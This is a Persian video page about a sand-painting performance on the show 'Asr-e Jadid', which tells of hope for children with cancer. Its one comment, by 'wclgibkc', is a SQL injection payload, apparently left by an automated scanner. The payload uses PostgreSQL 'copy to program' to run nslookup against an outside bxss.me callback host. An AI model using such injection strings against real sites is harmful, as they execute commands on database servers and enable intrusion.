معجزه نقاشی با شن در عصرجدید - شبکه‌ما

روایت جادو و اکسیرِ "امید" برای شکست سرطان در کودکان مبتلا؛ پرنده خوش‌خبرِ سلامتی، همین نزدیکی‌هاست... فاطمه عبادی؛ سومین اجرای برنامه چهاردهم از دور دوم  

معجزه نقاشی با شن در عصرجدید

توضیحات:

روایت جادو و اکسیرِ "امید" برای شکست سرطان در کودکان مبتلا؛ پرنده خوش‌خبرِ سلامتی، همین نزدیکی‌هاست... فاطمه عبادی؛ سومین اجرای برنامه چهاردهم از دور دوم

 


  • wclgibkc
    wclgibkc |

    1';copy (select '') to program 'nslookup dns.sqli.\028473.79015-10218.79015.79401.\1.bxss.me